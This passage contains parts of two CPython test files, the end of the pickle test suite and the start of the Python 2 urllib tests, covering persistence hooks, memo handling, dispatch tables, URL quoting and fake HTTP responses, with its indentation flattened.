self.dump(123, file=f, protocol=-1)
self.dumps(123, -1)
self.dumps(123, protocol=-1)
self.Pickler(f, -1)
self.Pickler(f, protocol=-1)
def test_dump_text_file(self):
f = open(TESTFN, "w")
try:
for proto in protocols:
self.assertRaises(TypeError, self.dump, 123, f, proto)
finally:
f.close()
support.unlink(TESTFN)
def test_incomplete_input(self):
s = io.BytesIO(b"X''.")
self.assertRaises((EOFError, struct.error, pickle.UnpicklingError), self.load, s)
def test_bad_init(self):
# Test issue3664 (pickle can segfault from a badly initialized Pickler).
# Override initialization without calling __init__() of the superclass.
class BadPickler(self.Pickler):
def __init__(self): pass
class BadUnpickler(self.Unpickler):
def __init__(self): pass
self.assertRaises(pickle.PicklingError, BadPickler().dump, 0)
self.assertRaises(pickle.UnpicklingError, BadUnpickler().load)
def check_dumps_loads_oob_buffers(self, dumps, loads):
# No need to do the full gamut of tests here, just enough to
# check that dumps() and loads() redirect their arguments
# to the underlying Pickler and Unpickler, respectively.
obj = ZeroCopyBytes(b"foo")
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
dumps(obj, protocol=proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = dumps(obj, protocol=proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"foo", data)
self.assertEqual(bytes(buffers[0]), b"foo")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
loads(data)
new = loads(data, buffers=buffers)
self.assertIs(new, obj)
def test_dumps_loads_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dumps() and loads()
self.check_dumps_loads_oob_buffers(self.dumps, self.loads)
def test_dump_load_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dump() and load()
def dumps(obj, **kwargs):
f = io.BytesIO()
self.dump(obj, f, **kwargs)
return f.getvalue()
def loads(data, **kwargs):
f = io.BytesIO(data)
return self.load(f, **kwargs)
self.check_dumps_loads_oob_buffers(dumps, loads)
class AbstractPersistentPicklerTests(unittest.TestCase):
# This class defines persistent_id() and persistent_load()
# functions that should be used by the pickler. All even integers
# are pickled using persistent ids.
def persistent_id(self, object):
if isinstance(object, int) and object % 2 == 0:
self.id_count += 1
return str(object)
elif object == "test_false_value":
self.false_count += 1
return ""
else:
return None
def persistent_load(self, oid):
if not oid:
self.load_false_count += 1
return "test_false_value"
else:
self.load_count += 1
object = int(oid)
assert object % 2 == 0
return object
def test_persistence(self):
L = list(range(10)) + ["test_false_value"]
for proto in protocols:
self.id_count = 0
self.false_count = 0
self.load_false_count = 0
self.load_count = 0
self.assertEqual(self.loads(self.dumps(L, proto)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.false_count, 1)
self.assertEqual(self.load_count, 5)
self.assertEqual(self.load_false_count, 1)
class AbstractIdentityPersistentPicklerTests(unittest.TestCase):
def persistent_id(self, obj):
return obj
def persistent_load(self, pid):
return pid
def _check_return_correct_type(self, obj, proto):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIsInstance(unpickled, type(obj))
self.assertEqual(unpickled, obj)
def test_return_correct_type(self):
for proto in protocols:
# Protocol 0 supports only ASCII strings.
if proto == 0:
self._check_return_correct_type("abc", 0)
else:
for obj in [b"abc\n", "abc\n", -1, -1.1 * 0.1, str]:
self._check_return_correct_type(obj, proto)
def test_protocol0_is_ascii_only(self):
non_ascii_str = "\N{EMPTY SET}"
self.assertRaises(pickle.PicklingError, self.dumps, non_ascii_str, 0)
pickled = pickle.PERSID + non_ascii_str.encode('utf-8') + b'\n.'
self.assertRaises(pickle.UnpicklingError, self.loads, pickled)
class AbstractPicklerUnpicklerObjectTests(unittest.TestCase):
pickler_class = None
unpickler_class = None
def setUp(self):
assert self.pickler_class
assert self.unpickler_class
def test_clear_pickler_memo(self):
# To test whether clear_memo() has any effect, we pickle an object,
# then pickle it again without clearing the memo; the two serialized
# forms should be different. If we clear_memo() and then pickle the
# object again, the third serialized form should be identical to the
# first one we obtained.
data = ["abcdefg", "abcdefg", 44]
for proto in protocols:
f = io.BytesIO()
pickler = self.pickler_class(f, proto)
pickler.dump(data)
first_pickled = f.getvalue()
# Reset BytesIO object.
f.seek(0)
f.truncate()
pickler.dump(data)
second_pickled = f.getvalue()
# Reset the Pickler and BytesIO objects.
pickler.clear_memo()
f.seek(0)
f.truncate()
pickler.dump(data)
third_pickled = f.getvalue()
self.assertNotEqual(first_pickled, second_pickled)
self.assertEqual(first_pickled, third_pickled)
def test_priming_pickler_memo(self):
# Verify that we can set the Pickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
self.assertNotEqual(first_pickled, primed_pickled)
def test_priming_unpickler_memo(self):
# Verify that we can set the Unpickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
unpickler = self.unpickler_class(io.BytesIO(first_pickled))
unpickled_data1 = unpickler.load()
self.assertEqual(unpickled_data1, data)
primed = self.unpickler_class(io.BytesIO(primed_pickled))
primed.memo = unpickler.memo
unpickled_data2 = primed.load()
primed.memo.clear()
self.assertEqual(unpickled_data2, data)
self.assertTrue(unpickled_data2 is unpickled_data1)
def test_reusing_unpickler_objects(self):
data1 = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data1)
pickled1 = f.getvalue()
data2 = ["abcdefg", 44, 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data2)
pickled2 = f.getvalue()
f = io.BytesIO()
f.write(pickled1)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data1)
f.seek(0)
f.truncate()
f.write(pickled2)
f.seek(0)
self.assertEqual(unpickler.load(), data2)
def _check_multiple_unpicklings(self, ioclass, *, seekable=True):
for proto in protocols:
with self.subTest(proto=proto):
data1 = [(x, str(x)) for x in range(2000)] + [b"abcde", len]
f = ioclass()
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data1)
pickled = f.getvalue()
N = 5
f = ioclass(pickled * N)
unpickler = self.unpickler_class(f)
for i in range(N):
if seekable:
pos = f.tell()
self.assertEqual(unpickler.load(), data1)
if seekable:
self.assertEqual(f.tell(), pos + len(pickled))
self.assertRaises(EOFError, unpickler.load)
def test_multiple_unpicklings_seekable(self):
self._check_multiple_unpicklings(io.BytesIO)
def test_multiple_unpicklings_unseekable(self):
self._check_multiple_unpicklings(UnseekableIO, seekable=False)
def test_multiple_unpicklings_minimal(self):
# File-like object that doesn't support peek() and readinto()
# (bpo-39681)
self._check_multiple_unpicklings(MinimalIO, seekable=False)
def test_unpickling_buffering_readline(self):
# Issue #12687: the unpickler's buffering logic could fail with
# text mode opcodes.
data = list(range(10))
for proto in protocols:
for buf_size in range(1, 11):
f = io.BufferedRandom(io.BytesIO(), buffer_size=buf_size)
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data)
# Tests for dispatch_table attribute
REDUCE_A = 'reduce_A'
class AAA(object):
def __reduce__(self):
return str, (REDUCE_A,)
class BBB(object):
def __init__(self):
# Add an instance attribute to enable state-saving routines at pickling
# time.
self.a = "some attribute"
def __setstate__(self, state):
self.a = "BBB.__setstate__"
def setstate_bbb(obj, state):
"""Custom state setter for BBB objects
Such callable may be created by other persons than the ones who created the
BBB class. If passed as the state_setter item of a custom reducer, this
allows for custom state setting behavior of BBB objects. One can think of
it as the analogous of list_setitems or dict_setitems but for foreign
classes/functions.
"""
obj.a = "custom state_setter"
class AbstractCustomPicklerClass:
"""Pickler implementing a reducing hook using reducer_override."""
def reducer_override(self, obj):
obj_name = getattr(obj, "__name__", None)
if obj_name == 'f':
# asking the pickler to save f as 5
return int, (5, )
if obj_name == 'MyClass':
return str, ('some str',)
elif obj_name == 'g':
# in this case, the callback returns an invalid result (not a 2-5
# tuple or a string), the pickler should raise a proper error.
return False
elif obj_name == 'h':
# Simulate a case when the reducer fails. The error should
# be propagated to the original ``dump`` call.
raise ValueError('The reducer just failed')
return NotImplemented
class AbstractHookTests(unittest.TestCase):
def test_pickler_hook(self):
# test the ability of a custom, user-defined CPickler subclass to
# override the default reducing routines of any type using the method
# reducer_override
def f():
pass
def g():
pass
def h():
pass
class MyClass:
pass
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump([f, MyClass, math.log])
new_f, some_str, math_log = pickle.loads(bio.getvalue())
self.assertEqual(new_f, 5)
self.assertEqual(some_str, 'some str')
# math.log does not have its usual reducer overriden, so the
# custom reduction callback should silently direct the pickler
# to the default pickling by attribute, by returning
# NotImplemented
self.assertIs(math_log, math.log)
with self.assertRaises(pickle.PicklingError):
p.dump(g)
with self.assertRaisesRegex(
ValueError, 'The reducer just failed'):
p.dump(h)
@support.cpython_only
def test_reducer_override_no_reference_cycle(self):
# bpo-39492: reducer_override used to induce a spurious reference cycle
# inside the Pickler object, that could prevent all serialized objects
# from being garbage-collected without explicity invoking gc.collect.
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
def f():
pass
wr = weakref.ref(f)
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump(f)
new_f = pickle.loads(bio.getvalue())
assert new_f == 5
del p
del f
self.assertIsNone(wr())
class AbstractDispatchTableTests(unittest.TestCase):
def test_default_dispatch_table(self):
# No dispatch_table attribute by default
f = io.BytesIO()
p = self.pickler_class(f, 0)
with self.assertRaises(AttributeError):
p.dispatch_table
self.assertFalse(hasattr(p, 'dispatch_table'))
def test_class_dispatch_table(self):
# A dispatch_table attribute can be specified class-wide
dt = self.get_dispatch_table()
class MyPickler(self.pickler_class):
dispatch_table = dt
def dumps(obj, protocol=None):
f = io.BytesIO()
p = MyPickler(f, protocol)
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def test_instance_dispatch_table(self):
# A dispatch_table attribute can also be specified instance-wide
dt = self.get_dispatch_table()
def dumps(obj, protocol=None):
f = io.BytesIO()
p = self.pickler_class(f, protocol)
p.dispatch_table = dt
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def _test_dispatch_table(self, dumps, dispatch_table):
def custom_load_dump(obj):
return pickle.loads(dumps(obj, 0))
def default_load_dump(obj):
return pickle.loads(pickle.dumps(obj, 0))
# pickling complex numbers using protocol 0 relies on copyreg
# so check pickling a complex number still works
z = 1 + 2j
self.assertEqual(custom_load_dump(z), z)
self.assertEqual(default_load_dump(z), z)
# modify pickling of complex
REDUCE_1 = 'reduce_1'
def reduce_1(obj):
return str, (REDUCE_1,)
dispatch_table[complex] = reduce_1
self.assertEqual(custom_load_dump(z), REDUCE_1)
self.assertEqual(default_load_dump(z), z)
# check picklability of AAA and BBB
a = AAA()
b = BBB()
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# modify pickling of BBB
dispatch_table[BBB] = reduce_1
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertEqual(custom_load_dump(b), REDUCE_1)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# revert pickling of BBB and modify pickling of AAA
REDUCE_2 = 'reduce_2'
def reduce_2(obj):
return str, (REDUCE_2,)
dispatch_table[AAA] = reduce_2
del dispatch_table[BBB]
self.assertEqual(custom_load_dump(a), REDUCE_2)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# End-to-end testing of save_reduce with the state_setter keyword
# argument. This is a dispatch_table test as the primary goal of
# state_setter is to tweak objects reduction behavior.
# In particular, state_setter is useful when the default __setstate__
# behavior is not flexible enough.
# No custom reducer for b has been registered for now, so
# BBB.__setstate__ should be used at unpickling time
self.assertEqual(default_load_dump(b).a, "BBB.__setstate__")
def reduce_bbb(obj):
return BBB, (), obj.__dict__, None, None, setstate_bbb
dispatch_table[BBB] = reduce_bbb
# The custom reducer reduce_bbb includes a state setter, that should
# have priority over BBB.__setstate__
self.assertEqual(custom_load_dump(b).a, "custom state_setter")
if __name__ == "__main__":
# Print some stuff that can be used to rewrite DATA{0,1,2}
from pickletools import dis
x = create_data()
for i in range(pickle.HIGHEST_PROTOCOL+1):
p = pickle.dumps(x, i)
print("DATA{0} = (".format(i))
for j in range(0, len(p), 20):
b = bytes(p[j:j+20])
print(" {0!r}".format(b))
print(")")
print()
print("# Disassembly of DATA{0}".format(i))
print("DATA{0}_DIS = \"\"\"\\".format(i))
dis(p)
print("\"\"\"")
print()
|
test_urllib.py
|
"""Regresssion tests for urllib"""
import urllib
import httplib
import unittest
from test import test_support
import os
import mimetools
import tempfile
import StringIO
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
"""Setup of a temp file to use for testing"""
self.text = "test_urllib: %s\n" % self.__class__.__name__
FILE = file(test_support.TESTFN, 'wb')
try:
FILE.write(self.text)
finally:
FILE.close()
self.pathname = test_support.TESTFN
self.returned_obj = urllib.urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(test_support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual('', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it hear and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), mimetools.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertEqual(self.returned_obj.getcode(), None)
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = test_support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in os.environ.keys():
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.getproxies_environment()
# getproxies_environment use lowered case truncated (no '_proxy') keys
self.assertEquals('localhost', proxies['no'])
class urlopen_HttpTests(unittest.TestCase):
"""Test urlopen() opening a fake http connection."""
def fakehttp(self, fakedata):
class FakeSocket(StringIO.StringIO):
def sendall(self, str): pass
def makefile(self, mode, name): return self
def read(self, amt=None):
if self.closed: return ''
return StringIO.StringIO.read(self, amt)
def readline(self, length=None):
if self.closed: return ''
return StringIO.StringIO.readline(self, length)
class FakeHTTPConnection(httplib.HTTPConnection):
def connect(self):
self.sock = FakeSocket(fakedata)
assert httplib.HTTP._connection_class == httplib.HTTPConnection
httplib.HTTP._connection_class = FakeHTTPConnection
def unfakehttp(self):
httplib.HTTP._connection_class = httplib.HTTPConnection
def test_read(self):
self.fakehttp('Hello!')
try:
fp = urllib.urlopen("http://python.org/")
self.assertEqual(fp.readline(), 'Hello!')
self.assertEqual(fp.readline(), '')
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_read_bogus(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp('''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(IOError, urllib.urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises IOError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp('')
try:
self.assertRaises(IOError, urllib.urlopen, 'http://something')
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(test_support.TESTFN)
self.text = 'testing urllib.urlretrieve'
try:
FILE = file(test_support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
return "file://%s" % urllib.pathname2url(os.path.abspath(filePath))
def createNewTempFile(self, data=""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.urlretrieve("file:%s" % test_support.TESTFN)
self.assertEqual(result[0], test_support.TESTFN)
self.assertIsInstance(result[1], mimetools.Message,
"did not get a mimetools.Message instance as "
"second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.urlretrieve(self.constructLocalFileUrl(
test_support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = file(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assertIsInstance(count, int)
self.assertIsInstance(block_size, int)
self.assertIsInstance(total_size, int)
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.urlretrieve(self.constructLocalFileUrl(test_support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile()
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read). Since the block size is 8192 bytes, only one block read is
# required to read the entire file.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 5)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 8193)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 8193)
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 ("Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>. The Python
code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly.
Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %s != %s" % (do_not_quote, result))
result = urllib.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %s != %s" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.quote.func_defaults[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %s != %s" % (quote_by_default, result))
result = urllib.quote_plus(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %s != %s" %
(quote_by_default, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): %s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %s != %s" % (expected, result))
self.assertEqual(expected, result,
"using quote_plus(): %s != %s" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %s != %s" % (result, hexescape(' ')))
result = urllib.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %s != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.quote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %s != %s" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using quote(): not all characters escaped; %s" %
result)
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = '\xab\xea'
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquote_with_unicode(self):
r = urllib.unquote(u'br%C3%BCckner_sapporo_20050930.doc')
self.assertEqual(r, u'br\xc3\xbcckner_sapporo_20050930.doc')
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.quote_plus(str(['1', '2', '3']))
result = urllib.urlencode(given)
self.assertEqual(expect, result)
result = urllib.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathnam2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.quote("quot=ing")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
